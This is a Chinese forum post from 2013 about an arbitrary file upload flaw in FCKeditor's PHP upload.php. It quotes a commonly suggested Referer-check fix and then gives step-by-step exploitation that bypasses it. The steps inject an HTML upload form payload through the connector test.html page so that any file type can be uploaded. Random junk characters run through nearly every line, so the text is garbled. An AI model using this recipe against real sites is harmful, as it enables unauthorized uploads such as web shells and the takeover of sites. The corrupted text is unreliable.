漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
9 S. @/ n9 [, h* H' v X# l网上给出的修复方案是
7 C i a0 O1 g修复方法,删除FCK编辑器用其他的编辑器+ o- |; S" Q5 s& w
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件0 l P5 u3 A3 ~
在
8 g( E" x$ p# q# f; Jrequire(‘config.php’);
6 `& a- ^! b8 y+ A% `& M8 c, Nrequire(‘util.php’);
& J) h( m3 ]& |& @& g2 m6 L的下面添加以下代码—————————–
2 I2 h% [1 ?" ^7 k//防止外部提交
; |9 X6 W5 A; {. k. A5 c6 Efunction outsidepost(), \5 |& j5 A* g1 l1 i
{
( L) x( }2 x& d; S$servername=$_SERVER['SERVER_NAME'];. u; b" j- r3 S8 _+ ]1 q5 _
$sub_from=@$_SERVER['HTTP_REFERER'];
9 z2 l! `6 v; l! T* _& r$sub_len=strlen($servername);/ n; r, X+ {2 G0 F) i+ v
$checkfrom=substr($sub_from,7,$sub_len);
W% }0 W5 ^6 tif($checkfrom!=$servername){& i9 z9 i3 O1 X: t
echo(“you don’t outsidepost!”);* |% m h* L: _& F! D
exit;
, d0 y0 F' Y' ?) w, e* q3 z}
* K3 H' d4 V/ y* ?}. |( o1 H( F/ z- b% z Y
outsidepost();) X7 |8 l9 H. z" U
防止外部提交,但是没有防止内部提交,
# g6 d; `! W3 i1 W. t4 _利用方法:
+ i' _7 M7 x$ A. s7 c3 s: x: i2 \4 h1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html4 g, d, k) K2 S, d" C7 f
2,在Current Folder 框输入+ T5 n6 Z$ m! U
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
2 P- b* f4 `/ d t P, k8 f+ D Q然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
; J% Z( C/ [: P p) JPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对